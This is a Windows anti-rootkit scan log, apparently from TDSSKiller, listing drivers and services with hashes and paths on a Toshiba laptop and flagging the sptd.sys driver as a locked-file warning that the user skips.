13:27:15.0233 5964	ServiceLayer - ok
13:27:15.0311 5964	SessionEnv (d2193326f729b163125610dbf3e17d57) C:\Windows\system32\sessenv.dll
13:27:15.0311 5964	SessionEnv - ok
13:27:15.0373 5964	sffdisk (3efa810bdca87f6ecc24f9832243fe86) C:\Windows\system32\DRIVERS\sffdisk.sys
13:27:15.0373 5964	sffdisk - ok
13:27:15.0420 5964	sffp_mmc (8fd08a310645fe872eeec6e08c6bf3ee) C:\Windows\system32\drivers\sffp_mmc.sys
13:27:15.0420 5964	sffp_mmc - ok
13:27:15.0498 5964	sffp_sd (9f66a46c55d6f1ccabc79bb7afccc545) C:\Windows\system32\DRIVERS\sffp_sd.sys
13:27:15.0513 5964	sffp_sd - ok
13:27:15.0545 5964	sfloppy (46ed8e91793b2e6f848015445a0ac188) C:\Windows\system32\drivers\sfloppy.sys
13:27:15.0545 5964	sfloppy - ok
13:27:15.0825 5964	SharedAccess (e1499bd0ff76b1b2fbbf1af339d91165) C:\Windows\System32\ipnathlp.dll
13:27:15.0841 5964	SharedAccess - ok
13:27:15.0888 5964	ShellHWDetection (c7230fbee14437716701c15be02c27b8) C:\Windows\System32\shsvcs.dll
13:27:15.0888 5964	ShellHWDetection - ok
13:27:15.0935 5964	SI3132 (7d494c2000287595d87b9ff6b080d3ff) C:\Windows\system32\DRIVERS\SI3132.sys
13:27:15.0935 5964	SI3132 - ok
13:27:15.0966 5964	SiFilter (df978385397187ba5e5e1c9c56a80a1a) C:\Windows\system32\DRIVERS\SiWinAcc.sys
13:27:15.0966 5964	SiFilter - ok
13:27:16.0013 5964	simptcp (a275fbb7c99458c12e088dff3e58eb4d) C:\Windows\System32\tcpsvcs.exe
13:27:16.0013 5964	simptcp - ok
13:27:16.0044 5964	SiRemFil (aaab072321d75a366269a6d089f3d71e) C:\Windows\system32\DRIVERS\SiRemFil.sys
13:27:16.0044 5964	SiRemFil - ok
13:27:16.0059 5964	sisagp (d2a595d6eebeeaf4334f8e50efbc9931) C:\Windows\system32\drivers\sisagp.sys
13:27:16.0059 5964	sisagp - ok
13:27:16.0106 5964	SiSRaid2 (cedd6f4e7d84e9f98b34b3fe988373aa) C:\Windows\system32\drivers\sisraid2.sys
13:27:16.0106 5964	SiSRaid2 - ok
13:27:16.0122 5964	SiSRaid4 (df843c528c4f69d12ce41ce462e973a7) C:\Windows\system32\drivers\sisraid4.sys
13:27:16.0137 5964	SiSRaid4 - ok
13:27:17.0354 5964	slsvc (862bb4cbc05d80c5b45be430e5ef872f) C:\Windows\system32\SLsvc.exe
13:27:17.0510 5964	slsvc - ok
13:27:18.0243 5964	SLUINotify (6edc422215cd78aa8a9cde6b30abbd35) C:\Windows\system32\SLUINotify.dll
13:27:18.0259 5964	SLUINotify - ok
13:27:18.0368 5964	Smb (7b75299a4d201d6a6533603d6914ab04) C:\Windows\system32\DRIVERS\smb.sys
13:27:18.0368 5964	Smb - ok
13:27:18.0462 5964	SNMPTRAP (2a146a055b4401c16ee62d18b8e2a032) C:\Windows\System32\snmptrap.exe
13:27:18.0477 5964	SNMPTRAP - ok
13:27:18.0524 5964	spldr (7aebdeef071fe28b0eef2cdd69102bff) C:\Windows\system32\drivers\spldr.sys
13:27:18.0524 5964	spldr - ok
13:27:18.0883 5964	Spooler (8554097e5136c3bf9f69fe578a1b35f4) C:\Windows\System32\spoolsv.exe
13:27:18.0883 5964	Spooler - ok
13:27:18.0992 5964	sptd (7f1b7c4d446cd3f926af45b8c48bd593) C:\Windows\system32\Drivers\sptd.sys
13:27:18.0992 5964	Suspicious file (NoAccess): C:\Windows\system32\Drivers\sptd.sys. md5: 7f1b7c4d446cd3f926af45b8c48bd593
13:27:19.0008 5964	sptd ( LockedFile.Multi.Generic ) - warning
13:27:19.0008 5964	sptd - detected LockedFile.Multi.Generic (1)
13:27:19.0257 5964	srv (41987f9fc0e61adf54f581e15029ad91) C:\Windows\system32\DRIVERS\srv.sys
13:27:19.0273 5964	srv - ok
13:27:19.0335 5964	srv2 (ff33aff99564b1aa534f58868cbe41ef) C:\Windows\system32\DRIVERS\srv2.sys
13:27:19.0351 5964	srv2 - ok
13:27:19.0398 5964	srvnet (7605c0e1d01a08f3ecd743f38b834a44) C:\Windows\system32\DRIVERS\srvnet.sys
13:27:19.0398 5964	srvnet - ok
13:27:19.0757 5964	SSDPSRV (03d50b37234967433a5ea5ba72bc0b62) C:\Windows\System32\ssdpsrv.dll
13:27:19.0772 5964	SSDPSRV - ok
13:27:19.0866 5964	SstpSvc (6f1a32e7b7b30f004d9a20afadb14944) C:\Windows\system32\sstpsvc.dll
13:27:19.0866 5964	SstpSvc - ok
13:27:20.0053 5964	StarWindServiceAE (b1691af4a072cb674d600db16dd7308e) C:\Program Files\Alcohol Soft\Alcohol 52\StarWind\StarWindServiceAE.exe
13:27:20.0069 5964	StarWindServiceAE - ok
13:27:20.0147 5964	StillCam (ef70b3d22b4bffda6ea851ecb063efaa) C:\Windows\system32\DRIVERS\serscan.sys
13:27:20.0147 5964	StillCam - ok
13:27:20.0240 5964	stisvc (5de7d67e49b88f5f07f3e53c4b92a352) C:\Windows\System32\wiaservc.dll
13:27:20.0271 5964	stisvc - ok
13:27:20.0318 5964	swenum (7ba58ecf0c0a9a69d44b3dca62becf56) C:\Windows\system32\DRIVERS\swenum.sys
13:27:20.0318 5964	swenum - ok
13:27:20.0505 5964	swprv (f21fd248040681cca1fb6c9a03aaa93d) C:\Windows\System32\swprv.dll
13:27:20.0521 5964	swprv - ok
13:27:20.0646 5964	Swupdtmr (327786c5d6bcf284fab14c2b5751f514) c:\Toshiba\IVP\swupdate\swupdtmr.exe
13:27:20.0646 5964	Swupdtmr - ok
13:27:20.0708 5964	Symc8xx (192aa3ac01df071b541094f251deed10) C:\Windows\system32\drivers\symc8xx.sys
13:27:20.0708 5964	Symc8xx - ok
13:27:20.0724 5964	Sym_hi (8c8eb8c76736ebaf3b13b633b2e64125) C:\Windows\system32\drivers\sym_hi.sys
13:27:20.0739 5964	Sym_hi - ok
13:27:20.0755 5964	Sym_u3 (8072af52b5fd103bbba387a1e49f62cb) C:\Windows\system32\drivers\sym_u3.sys
13:27:20.0755 5964	Sym_u3 - ok
13:27:20.0817 5964	SynTP (5efcedcf3daf5c8d9e8b77a34a4eec99) C:\Windows\system32\DRIVERS\SynTP.sys
13:27:20.0817 5964	SynTP - ok
13:27:20.0911 5964	SysMain (9a51b04e9886aa4ee90093586b0ba88d) C:\Windows\system32\sysmain.dll
13:27:20.0942 5964	SysMain - ok
13:27:20.0958 5964	TabletInputService (2dca225eae15f42c0933e998ee0231c3) C:\Windows\System32\TabSvc.dll
13:27:20.0973 5964	TabletInputService - ok
13:27:21.0051 5964	TapiSrv (d7673e4b38ce21ee54c59eeeb65e2483) C:\Windows\System32\tapisrv.dll
13:27:21.0051 5964	TapiSrv - ok
13:27:21.0114 5964	TBS (cb05822cd9cc6c688168e113c603dbe7) C:\Windows\System32\tbssvc.dll
13:27:21.0114 5964	TBS - ok
13:27:21.0223 5964	Tcpip (ee7e10bed85c312c1d5d30c435bdda9f) C:\Windows\system32\drivers\tcpip.sys
13:27:21.0270 5964	Tcpip - ok
13:27:21.0285 5964	Tcpip6 (ee7e10bed85c312c1d5d30c435bdda9f) C:\Windows\system32\DRIVERS\tcpip.sys
13:27:21.0285 5964	Tcpip6 - ok
13:27:21.0317 5964	tcpipreg (2c2d4cff5e09c73908f9b5af49a51365) C:\Windows\system32\drivers\tcpipreg.sys
13:27:21.0317 5964	tcpipreg - ok
13:27:21.0379 5964	tdcmdpst (1825bceb47bf41c5a9f0e44de82fc27a) C:\Windows\system32\DRIVERS\tdcmdpst.sys
13:27:21.0379 5964	tdcmdpst - ok
13:27:21.0426 5964	TDPIPE (5dcf5e267be67a1ae926f2df77fbcc56) C:\Windows\system32\drivers\tdpipe.sys
13:27:21.0426 5964	TDPIPE - ok
13:27:21.0457 5964	TDTCP (389c63e32b3cefed425b61ed92d3f021) C:\Windows\system32\drivers\tdtcp.sys
13:27:21.0457 5964	TDTCP - ok
13:27:21.0473 5964	tdx (76b06eb8a01fc8624d699e7045303e54) C:\Windows\system32\DRIVERS\tdx.sys
13:27:21.0488 5964	tdx - ok
13:27:23.0017 5964	TeamViewer6 (fe559178000347d2ca1b7847f0379749) C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
13:27:23.0033 5964	TeamViewer6 - ok
13:27:23.0469 5964	TermDD (3cad38910468eab9a6479e2f01db43c7) C:\Windows\system32\DRIVERS\termdd.sys
13:27:23.0469 5964	TermDD - ok
13:27:23.0922 5964	TermService (bb95da09bef6e7a131bff3ba5032090d) C:\Windows\System32\termsrv.dll
13:27:23.0953 5964	TermService - ok
13:27:24.0062 5964	Themes (c7230fbee14437716701c15be02c27b8) C:\Windows\system32\shsvcs.dll
13:27:24.0062 5964	Themes - ok
13:27:24.0249 5964	THREADORDER (1076ffcffaae8385fd62dfcb25ac4708) C:\Windows\system32\mmcss.dll
13:27:24.0249 5964	THREADORDER - ok
13:27:24.0312 5964	tifm21 (28b7f973c36d157a7885b1ae42a4a2a9) C:\Windows\system32\drivers\tifm21.sys
13:27:24.0343 5964	tifm21 - ok
13:27:24.0686 5964	TNaviSrv (38e18dce385ff2ded57423a279559dbc) C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
13:27:24.0686 5964	TNaviSrv - ok
13:27:24.0795 5964	TODDSrv (d540858e65bfa6fded41ad2495ece344) C:\Windows\system32\TODDSrv.exe
13:27:24.0795 5964	TODDSrv - ok
13:27:25.0076 5964	TosCoSrv (6a54c28b53c6b50d333c8ee974c6b208) C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
13:27:25.0076 5964	TosCoSrv - ok
13:27:25.0092 5964	Tosrfcom - ok
13:27:25.0154 5964	tos_sps32 (1ea5f27c29405bf49799feca77186da9) C:\Windows\system32\DRIVERS\tos_sps32.sys
13:27:25.0170 5964	tos_sps32 - ok
13:27:25.0185 5964	TpChoice - ok
13:27:25.0279 5964	TrkWks (ec74e77d0eb004bd3a809b5f8fb8c2ce) C:\Windows\System32\trkwks.dll
13:27:25.0279 5964	TrkWks - ok
13:27:25.0373 5964	TrustedInstaller (97d9d6a04e3ad9b6c626b9931db78dba) C:\Windows\servicing\TrustedInstaller.exe
13:27:25.0373 5964	TrustedInstaller - ok
13:27:25.0435 5964	tssecsrv (dcf0f056a2e4f52287264f5ab29cf206) C:\Windows\system32\DRIVERS\tssecsrv.sys
13:27:25.0435 5964	tssecsrv - ok
13:27:25.0482 5964	tunmp (caecc0120ac49e3d2f758b9169872d38) C:\Windows\system32\DRIVERS\tunmp.sys
13:27:25.0482 5964	tunmp - ok
13:27:25.0544 5964	tunnel (300db877ac094feab0be7688c3454a9c) C:\Windows\system32\DRIVERS\tunnel.sys
13:27:25.0544 5964	tunnel - ok
13:27:25.0575 5964	TVALZ (792a8b80f8188aba4b2be271583f3e46) C:\Windows\system32\DRIVERS\TVALZ_O.SYS
13:27:25.0591 5964	TVALZ - ok
13:27:25.0622 5964	uagp35 (c3ade15414120033a36c0f293d4a4121) C:\Windows\system32\drivers\uagp35.sys
13:27:25.0638 5964	uagp35 - ok
13:27:25.0669 5964	udfs (d9728af68c4c7693cb100b8441cbdec6) C:\Windows\system32\DRIVERS\udfs.sys
13:27:25.0669 5964	udfs - ok
13:27:25.0716 5964	UI0Detect (ecef404f62863755951e09c802c94ad5) C:\Windows\system32\UI0Detect.exe
13:27:25.0731 5964	UI0Detect - ok
13:27:25.0825 5964	UleadBurningHelper (332d341d92b933600d41953b08360dfb) C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
13:27:25.0825 5964	UleadBurningHelper - ok
13:27:25.0856 5964	uliagpkx (75e6890ebfce0841d3291b02e7a8bdb0) C:\Windows\system32\drivers\uliagpkx.sys
13:27:25.0856 5964	uliagpkx - ok
13:27:25.0887 5964	uliahci (3cd4ea35a6221b85dcc25daa46313f8d) C:\Windows\system32\drivers\uliahci.sys
13:27:25.0903 5964	uliahci - ok
13:27:25.0919 5964	UlSata (8514d0e5cd0534467c5fc61be94a569f) C:\Windows\system32\drivers\ulsata.sys
13:27:25.0934 5964	UlSata - ok
13:27:25.0965 5964	ulsata2 (38c3c6e62b157a6bc46594fada45c62b) C:\Windows\system32\drivers\ulsata2.sys
13:27:25.0965 5964	ulsata2 - ok
13:27:26.0012 5964	umbus (32cff9f809ae9aed85464492bf3e32d2) C:\Windows\system32\DRIVERS\umbus.sys
13:27:26.0012 5964	umbus - ok
13:27:26.0075 5964	upnphost (68308183f4ae0be7bf8ecd07cb297999) C:\Windows\System32\upnphost.dll
13:27:26.0106 5964	upnphost - ok
13:27:26.0153 5964	USBAAPL (83cafcb53201bbac04d822f32438e244) C:\Windows\system32\Drivers\usbaapl.sys
13:27:26.0184 5964	USBAAPL - ok
13:27:26.0293 5964	usbaudio (32db9517628ff0d070682aab61e688f0) C:\Windows\system32\drivers\usbaudio.sys
13:27:26.0293 5964	usbaudio - ok
13:27:26.0355 5964	usbccgp (caf811ae4c147ffcd5b51750c7f09142) C:\Windows\system32\DRIVERS\usbccgp.sys
13:27:26.0355 5964	usbccgp - ok
13:27:26.0402 5964	usbcir (e9476e6c486e76bc4898074768fb7131) C:\Windows\system32\drivers\usbcir.sys
13:27:26.0402 5964	usbcir - ok
13:27:26.0449 5964	usbehci (79e96c23a97ce7b8f14d310da2db0c9b) C:\Windows\system32\DRIVERS\usbehci.sys
13:27:26.0465 5964	usbehci - ok
13:27:26.0496 5964	usbhub (4673bbcb006af60e7abddbe7a130ba42) C:\Windows\system32\DRIVERS\usbhub.sys
13:27:26.0511 5964	usbhub - ok
13:27:26.0574 5964	usbohci (ce697fee0d479290d89bec80dfe793b7) C:\Windows\system32\DRIVERS\usbohci.sys
13:27:26.0574 5964	usbohci - ok
13:27:26.0621 5964	usbprint (e75c4b5269091d15a2e7dc0b6d35f2f5) C:\Windows\system32\DRIVERS\usbprint.sys
13:27:26.0621 5964	usbprint - ok
13:27:26.0699 5964	usbscan (a508c9bd8724980512136b039bba65e9) C:\Windows\system32\DRIVERS\usbscan.sys
13:27:26.0714 5964	usbscan - ok
13:27:26.0777 5964	USBSTOR (be3da31c191bc222d9ad503c5224f2ad) C:\Windows\system32\DRIVERS\USBSTOR.SYS
13:27:26.0792 5964	USBSTOR - ok
13:27:26.0823 5964	usbuhci (325dbbacb8a36af9988ccf40eac228cc) C:\Windows\system32\DRIVERS\usbuhci.sys
13:27:26.0823 5964	usbuhci - ok
13:27:26.0870 5964	usbvideo (0a6b81f01bc86399482e27e6fda7b33b) C:\Windows\system32\Drivers\usbvideo.sys
13:27:26.0886 5964	usbvideo - ok
13:27:26.0917 5964	UVCFTR (5701a984efa8e209848a6d556dd02933) C:\Windows\system32\DRIVERS\UVCFTR_S.SYS
13:27:26.0917 5964	UVCFTR - ok
13:27:26.0964 5964	UxSms (1509e705f3ac1d474c92454a5c2dd81f) C:\Windows\System32\uxsms.dll
13:27:26.0979 5964	UxSms - ok
13:27:27.0323 5964	vds (cd88d1b7776dc17a119049742ec07eb4) C:\Windows\System32\vds.exe
13:27:27.0385 5964	vds - ok
13:27:27.0432 5964	vga (7d92be0028ecdedec74617009084b5ef) C:\Windows\system32\DRIVERS\vgapnp.sys
13:27:27.0432 5964	vga - ok
13:27:27.0479 5964	VgaSave (2e93ac0a1d8c79d019db6c51f036636c) C:\Windows\System32\drivers\vga.sys
13:27:27.0479 5964	VgaSave - ok
13:27:27.0494 5964	viaagp (045d9961e591cf0674a920b6ba3ba5cb) C:\Windows\system32\drivers\viaagp.sys
13:27:27.0510 5964	viaagp - ok
13:27:27.0525 5964	ViaC7 (56a4de5f02f2e88182b0981119b4dd98) C:\Windows\system32\drivers\viac7.sys
13:27:27.0525 5964	ViaC7 - ok
13:27:27.0557 5964	viaide (fd2e3175fcada350c7ab4521dca187ec) C:\Windows\system32\drivers\viaide.sys
13:27:27.0557 5964	viaide - ok
13:27:27.0697 5964	volmgr (69503668ac66c77c6cd7af86fbdf8c43) C:\Windows\system32\drivers\volmgr.sys
13:27:27.0697 5964	volmgr - ok
13:27:27.0791 5964	volmgrx (23e41b834759917bfd6b9a0d625d0c28) C:\Windows\system32\drivers\volmgrx.sys
13:27:27.0806 5964	volmgrx - ok
13:27:27.0853 5964	volsnap (147281c01fcb1df9252de2a10d5e7093) C:\Windows\system32\drivers\volsnap.sys
13:27:27.0853 5964	volsnap - ok
13:27:27.0931 5964	vsmraid (d984439746d42b30fc65a4c3546c6829) C:\Windows\system32\drivers\vsmraid.sys
13:27:27.0962 5964	vsmraid - ok
13:27:28.0415 5964	VSS (db3d19f850c6eb32bdcb9bc0836acddb) C:\Windows\system32\vssvc.exe
13:27:28.0493 5964	VSS - ok
13:27:28.0914 5964	W32Time (96ea68b9eb310a69c25ebb0282b2b9de) C:\Windows\system32\w32time.dll
13:27:28.0929 5964	W32Time - ok
13:27:29.0179 5964	W3SVC (9ca92191c8f18e8b491a5b28e63c07b7) C:\Windows\system32\inetsrv\iisw3adm.dll
13:27:29.0195 5964	W3SVC - ok
13:27:29.0366 5964	WacomPen (48dfee8f1af7c8235d4e626f0c4fe031) C:\Windows\system32\drivers\wacompen.sys
13:27:29.0366 5964	WacomPen - ok
13:27:29.0631 5964	Wanarp (55201897378cca7af8b5efd874374a26) C:\Windows\system32\DRIVERS\wanarp.sys
13:27:29.0631 5964	Wanarp - ok
13:27:29.0631 5964	Wanarpv6 (55201897378cca7af8b5efd874374a26) C:\Windows\system32\DRIVERS\wanarp.sys
13:27:29.0631 5964	Wanarpv6 - ok
13:27:29.0647 5964	WAS (9ca92191c8f18e8b491a5b28e63c07b7) C:\Windows\system32\inetsrv\iisw3adm.dll
13:27:29.0647 5964	WAS - ok
13:27:29.0803 5964	wcncsvc (a3cd60fd826381b49f03832590e069af) C:\Windows\System32\wcncsvc.dll
13:27:29.0819 5964	wcncsvc - ok
13:27:29.0865 5964	WcsPlugInService (11bcb7afcdd7aadacb5746f544d3a9c7) C:\Windows\System32\WcsPlugInService.dll
13:27:29.0881 5964	WcsPlugInService - ok
13:27:29.0912 5964	Wd (afc5ad65b991c1e205cf25cfdbf7a6f4) C:\Windows\system32\drivers\wd.sys
13:27:29.0912 5964	Wd - ok
13:27:30.0006 5964	Wdf01000 (b6f0a7ad6d4bd325fbcd8bac96cd8d96) C:\Windows\system32\drivers\Wdf01000.sys
13:27:30.0037 5964	Wdf01000 - ok
13:27:30.0115 5964	WdiServiceHost (abfc76b48bb6c96e3338d8943c5d93b5) C:\Windows\system32\wdi.dll
13:27:30.0115 5964	WdiServiceHost - ok
13:27:30.0115 5964	WdiSystemHost (abfc76b48bb6c96e3338d8943c5d93b5) C:\Windows\system32\wdi.dll
13:27:30.0131 5964	WdiSystemHost - ok
13:27:30.0224 5964	WebClient (04c37d8107320312fbae09926103d5e2) C:\Windows\System32\webclnt.dll
13:27:30.0240 5964	WebClient - ok
13:27:30.0380 5964	Wecsvc (ae3736e7e8892241c23e4ebbb7453b60) C:\Windows\system32\wecsvc.dll
13:27:30.0380 5964	Wecsvc - ok
13:27:30.0458 5964	wercplsupport (670ff720071ed741206d69bd995ea453) C:\Windows\System32\wercplsupport.dll
13:27:30.0474 5964	wercplsupport - ok
13:27:30.0536 5964	WerSvc (32b88481d3b326da6deb07b1d03481e7) C:\Windows\System32\WerSvc.dll
13:27:30.0552 5964	WerSvc - ok
13:27:30.0755 5964	WinDefend (4575aa12561c5648483403541d0d7f2b) C:\Program Files\Windows Defender\mpsvc.dll
13:27:30.0770 5964	WinDefend - ok
13:27:30.0770 5964	WinHttpAutoProxySvc - ok
13:27:30.0926 5964	Winmgmt (6b2a1d0e80110e3d04e6863c6e62fd8a) C:\Windows\system32\wbem\WMIsvc.dll
13:27:30.0926 5964	Winmgmt - ok
13:27:31.0113 5964	WinRM (7cfe68bdc065e55aa5e8421607037511) C:\Windows\system32\WsmSvc.dll
13:27:31.0176 5964	WinRM - ok
13:27:31.0457 5964	Wlansvc (c008405e4feeb069e30da1d823910234) C:\Windows\System32\wlansvc.dll
13:27:31.0503 5964	Wlansvc - ok
13:27:32.0486 5964	wlidsvc (0a70f4022ec2e14c159efc4f69aa2477) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
13:27:32.0595 5964	wlidsvc - ok
13:27:33.0547 5964	WmiAcpi (701a9f884a294327e9141d73746ee279) C:\Windows\system32\drivers\wmiacpi.sys
13:27:33.0547 5964	WmiAcpi - ok
13:27:33.0937 5964	wmiApSrv (43be3875207dcb62a85c8c49970b66cc) C:\Windows\system32\wbem\WmiApSrv.exe
13:27:33.0937 5964	wmiApSrv - ok
13:27:34.0374 5964	WMPNetworkSvc (3978704576a121a9204f8cc49a301a9b) C:\Program Files\Windows Media Player\wmpnetwk.exe
13:27:34.0452 5964	WMPNetworkSvc - ok
13:27:34.0514 5964	WPCSvc (cfc5a04558f5070cee3e3a7809f3ff52) C:\Windows\System32\wpcsvc.dll
13:27:34.0514 5964	WPCSvc - ok
13:27:34.0592 5964	WPDBusEnum (801fbdb89d472b3c467eb112a0fc9246) C:\Windows\system32\wpdbusenum.dll
13:27:34.0608 5964	WPDBusEnum - ok
13:27:35.0045 5964	WpdUsb (de9d36f91a4df3d911626643debf11ea) C:\Windows\system32\DRIVERS\wpdusb.sys
13:27:35.0341 5964	WpdUsb - ok
13:27:36.0261 5964	WPFFontCache_v0400 (dcf3e3edf5109ee8bc02fe6e1f045795) C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
13:27:36.0293 5964	WPFFontCache_v0400 - ok
13:27:36.0386 5964	ws2ifsl (e3a3cb253c0ec2494d4a61f5e43a389c) C:\Windows\system32\drivers\ws2ifsl.sys
13:27:36.0402 5964	ws2ifsl - ok
13:27:36.0449 5964	wscsvc (1ca6c40261ddc0425987980d0cd2aaab) C:\Windows\system32\wscsvc.dll
13:27:36.0480 5964	wscsvc - ok
13:27:36.0542 5964	WSDPrintDevice (4422ac5ed8d4c2f0db63e71d4c069dd7) C:\Windows\system32\DRIVERS\WSDPrint.sys
13:27:36.0542 5964	WSDPrintDevice - ok
13:27:36.0542 5964	WSearch - ok
13:27:37.0291 5964	wuauserv (6298277b73c77fa99106b271a7525163) C:\Windows\system32\wuaueng.dll
13:27:37.0400 5964	wuauserv - ok
13:27:38.0539 5964	WUDFRd (ac13cb789d93412106b0fb6c7eb2bcb6) C:\Windows\system32\DRIVERS\WUDFRd.sys
13:27:38.0539 5964	WUDFRd - ok
13:27:38.0586 5964	wudfsvc (575a4190d989f64732119e4114045a4f) C:\Windows\System32\WUDFSvc.dll
13:27:38.0586 5964	wudfsvc - ok
13:27:38.0913 5964	xnacc (9eea6d029fef5f3016d089b1a603837d) C:\Windows\system32\DRIVERS\xnacc.sys
13:27:38.0929 5964	xnacc - ok
13:27:38.0960 5964	MBR (0x1B8) (5b5e648d12fcadc244c1ec30318e1eb9) \Device\Harddisk0\DR0
13:27:39.0959 5964	\Device\Harddisk0\DR0 - ok
13:27:39.0990 5964	Boot (0x1200) (4c665477e7a79fdb1f3f319443854ef8) \Device\Harddisk0\DR0\Partition0
13:27:40.0083 5964	\Device\Harddisk0\DR0\Partition0 - ok
13:27:40.0083 5964	============================================================
13:27:40.0083 5964	Scan finished
13:27:40.0083 5964	============================================================
13:27:40.0099 4484	Detected object count: 1
13:27:40.0099 4484	Actual detected object count: 1
13:28:37.0667 4484	sptd ( LockedFile.Multi.Generic ) - skipped by user
13:28:37.0667 4484	sptd ( LockedFile.Multi.Generic ) - User select action: Skip 
13:29:01.0130 4240	============================================================
13:29:01.0130 4240	Scan started
13:29:01.0130 4240	Mode: Manual; SigCheck; TDLFS; 
13:29:01.0130 4240	============================================================
13:29:02.0495 4240	ACPI (82b296ae1892fe3dbee00c9cf92f8ac7) C:\Windows\system32\drivers\acpi.sys
13:29:02.0624 4240	ACPI - ok
13:29:02.0882 4240	AdobeFlashPlayerUpdateSvc (76d5a3d2a50402a0b9b6ed13c4371e79) C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
13:29:02.0903 4240	AdobeFlashPlayerUpdateSvc - ok
13:29:03.0092 4240	adp94xx (2edc5bbac6c651ece337bde8ed97c9fb) C:\Windows\system32\drivers\adp94xx.sys
13:29:03.0109 4240	adp94xx - ok
13:29:03.0200 4240	adpahci (b84088ca3cdca97da44a984c6ce1ccad) C:\Windows\system32\drivers\adpahci.sys
13:29:03.0220 4240	adpahci - ok
13:29:03.0386 4240	adpu160m (7880c67bccc27c86fd05aa2afb5ea469) C:\Windows\system32\drivers\adpu160m.sys
13:29:03.0403 4240	adpu160m - ok
13:29:03.0578 4240	adpu320 (9ae713f8e30efc2abccd84904333df4d) C:\Windows\system32\drivers\adpu320.sys
13:29:03.0596 4240	adpu320 - ok
13:29:03.0692 4240	AeLookupSvc (9d1fda9e086ba64e3c93c9de32461bcf) C:\Windows\System32\aelupsvc.dll
13:29:03.0826 4240	AeLookupSvc - ok
13:29:03.0898 4240	AFD (3911b972b55fea0478476b2e777b29fa) C:\Windows\system32\drivers\afd.sys
13:29:03.0940 4240	AFD - ok
13:29:03.0960 4240	AgereModemAudio (39e435c90c9c4f780fa0ed05ca3c3a1b) C:\Windows\system32\agrsmsvc.exe
13:29:03.0996 4240	AgereModemAudio - ok
13:29:04.0091 4240	AgereSoftModem (ce91b158fa490cf4c4d487a4130f4660) C:\Windows\system32\DRIVERS\AGRSM.sys
13:29:04.0158 4240	AgereSoftModem - ok
13:29:04.0208 4240	agp440 (ef23439cdd587f64c2c1b8825cead7d8) C:\Windows\system32\drivers\agp440.sys
13:29:04.0223 4240	agp440 - ok
13:29:04.0269 4240	aic78xx (ae1fdf7bf7bb6c6a70f67699d880592a) C:\Windows\system32\drivers\djsvs.sys
13:29:04.0285 4240	aic78xx - ok
13:29:04.0447 4240	ALG (a1545b731579895d8cc44fc0481c1192) C:\Windows\System32\alg.exe
13:29:04.0540 4240	ALG - ok
13:29:04.0564 4240	aliide (90395b64600ebb4552e26e178c94b2e4) C:\Windows\system32\drivers\aliide.sys
13:29:04.0578 4240	aliide - ok
13:29:04.0602 4240	amdagp (2b13e304c9dfdfa5eb582f6a149fa2c7) C:\Windows\system32\drivers\amdagp.sys
13:29:04.0617 4240	amdagp - ok
13:29:04.0655 4240	amdide (0577df1d323fe75a739c787893d300ea) C:\Windows\system32\drivers\amdide.sys
13:29:04.0670 4240	amdide - ok
13:29:04.0730 4240	AmdK7 (dc487885bcef9f28eece6fac0e5ddfc5) C:\Windows\system32\drivers\amdk7.sys
13:29:04.0846 4240	AmdK7 - ok
13:29:04.0974 4240	AmdK8 (93ae7f7dd54ab986a6f1a1b37be7442d) C:\Windows\system32\DRIVERS\amdk8.sys
13:29:05.0053 4240	AmdK8 - ok
13:29:05.0099 4240	ApfiltrService (7c2f57bce81fa74933f0e1c84a97c9db) C:\Windows\system32\DRIVERS\Apfiltr.sys
13:29:05.0238 4240	ApfiltrService - ok
13:29:05.0378 4240	AppHostSvc (dfae18c675d71fd06d57dc69d2913975) C:\Windows\system32\inetsrv\apphostsvc.dll
13:29:05.0468 4240	AppHostSvc - ok
13:29:05.0522 4240	Appinfo (c6d704c7f0434dc791aac37cac4b6e14) C:\Windows\System32\appinfo.dll
13:29:05.0566 4240	Appinfo - ok
13:29:05.0799 4240	Apple Mobile Device (7ef47644b74ebe721cc32211d3c35e76) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
13:29:05.0813 4240	Apple Mobile Device - ok
13:29:05.0933 4240	arc (5f673180268bb1fdb69c99b6619fe379) C:\Windows\system32\drivers\arc.sys
13:29:05.0948 4240	arc - ok
13:29:06.0036 4240	arcsas (957f7540b5e7f602e44648c7de5a1c05) C:\Windows\system32\drivers\arcsas.sys
13:29:06.0051 4240	arcsas - ok
13:29:06.0135 4240	AsyncMac (53b202abee6455406254444303e87be1) C:\Windows\system32\DRIVERS\asyncmac.sys
13:29:06.0230 4240	AsyncMac - ok
13:29:06.0265 4240	atapi (1f05b78ab91c9075565a9d8a4b880bc4) C:\Windows\system32\drivers\atapi.sys
13:29:06.0281 4240	atapi - ok
13:29:06.0459 4240	athr (8be56f8300e1c37b578da23c71816b7a) C:\Windows\system32\DRIVERS\athr.sys
13:29:06.0569 4240	athr - ok
13:29:06.0629 4240	Ati External Event Utility (59991b5ec50e106634a16444594c305e) C:\Windows\system32\Ati2evxx.exe
13:29:06.0696 4240	Ati External Event Utility - ok
13:29:06.0974 4240	atikmdag (fab37c8e4b55235de9055026561dcc7f) C:\Windows\system32\DRIVERS\atikmdag.sys
13:29:07.0240 4240	atikmdag - ok
13:29:07.0631 4240	AudioEndpointBuilder (68e2a1a0407a66cf50da0300852424ab) C:\Windows\System32\Audiosrv.dll
13:29:07.0681 4240	AudioEndpointBuilder - ok
13:29:07.0687 4240	Audiosrv (68e2a1a0407a66cf50da0300852424ab) C:\Windows\System32\Audiosrv.dll
13:29:07.0718 4240	Audiosrv - ok
13:29:07.0737 4240	axsaki - ok
13:29:07.0792 4240	Beep (67e506b75bd5326a3ec7b70bd014dfb6) C:\Windows\system32\drivers\Beep.sys
13:29:07.0853 4240	Beep - ok
13:29:07.0932 4240	BFE (c789af0f724fda5852fb9a7d3a432381) C:\Windows\System32\bfe.dll
13:29:07.0990 4240	BFE - ok
13:29:08.0159 4240	BITS (93952506c6d67330367f7e7934b6a02f) C:\Windows\system32\qmgr.dll
13:29:08.0292 4240	BITS - ok
13:29:08.0296 4240	blbdrive - ok
